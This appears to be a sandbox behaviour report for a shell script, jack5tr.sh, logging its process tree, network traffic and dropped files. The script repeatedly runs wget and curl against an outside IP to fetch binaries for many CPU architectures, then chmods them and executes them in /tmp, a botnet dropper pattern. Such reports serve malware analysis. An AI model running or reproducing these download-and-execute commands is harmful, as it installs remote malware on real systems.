/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x RUN arc arm gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86


/tmp/mips


/tmp/arc


/tmp/x86_64


/tmp/mpsl


/tmp/arm


/tmp/RUN


/tmp/arm5


/tmp/arm6


/tmp/arm7


/tmp/ppc


/tmp/spc


/tmp/m68k


/tmp/sh4
